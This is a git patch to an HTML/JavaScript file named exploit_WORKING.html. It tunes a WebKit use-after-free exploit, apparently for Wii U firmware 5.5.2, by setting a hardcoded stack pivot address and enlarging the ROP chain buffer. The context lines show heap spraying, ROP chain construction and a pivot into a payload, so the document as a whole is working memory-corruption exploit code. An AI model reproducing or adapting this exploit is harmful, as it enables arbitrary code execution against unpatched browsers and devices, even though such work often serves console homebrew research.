From 5d9ec5c5e9e2592ea9059a15a4388e9027c2dbcd Mon Sep 17 00:00:00 2001
From: WiiUTest <31256994+WiiUTest@users.noreply.github.com>
Date: Tue, 22 May 2018 16:39:25 +0200
Subject: [PATCH] 128MB Size

---
 payload/exploit_WORKING.html | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/payload/exploit_WORKING.html b/payload/exploit_WORKING.html
index 46dfd93..3a70342 100644
--- a/payload/exploit_WORKING.html
+++ b/payload/exploit_WORKING.html
@@ -15,7 +15,11 @@ function UaF(a)
     var ab = new ArrayBuffer(sizeWebCoreImageLoader);
     var dv = new DataView(ab)
     
-    var pivotAdressAdress       = 0x1CEE2000; //r6
+    //5.5.2
+    {
+        var pivotAdressAdress       = 0x1B2E2000; //r6
+        var payloadAdress           = pivotAdressAdress + 1720;
+    }
     /*
     0:000:x86> dt webkit!WebCore::ImageLoader
        +0x000 __VFN_table : Ptr32
@@ -39,11 +43,7 @@ function UaF(a)
     
     
     var pivotAdress             = 0x010ADDCC;
-    //5.5.2
-    {
-        var pivotAdressAdress       = 0x1CEE2000; //r6
-        var payloadAdress           = pivotAdressAdress + 1720;
-    }
+
     var codegenAddress          = 0x01800000;
     var sprayCount              = 0x1900;
     var _4K                     = 0x1000;
@@ -189,7 +189,7 @@ function UaF(a)
 
     //Construct the RopChain
     {
-        var RopChainAB = new ArrayBuffer(100*1024*1024);
+        var RopChainAB = new ArrayBuffer(128*1024*1024);
         var RopChain = new DataView(RopChainAB);
         for(var j=0; j<_32K; j+=4){
             RopChain.setUint32(j, 0x10000000+j); //filler
@@ -242,8 +242,13 @@ function UaF(a)
         for(var i=0; i<payload.length; i++){
             ropchain_appendu8(payload[i]);
         }
+        
+        
     }
 
+    //RopChain.setUint32(0x000, 0xDEADCACA);
+    //while(1){}
+    
     //Use the new WebCore::ImageLoader & pivot !
     return 0;
 }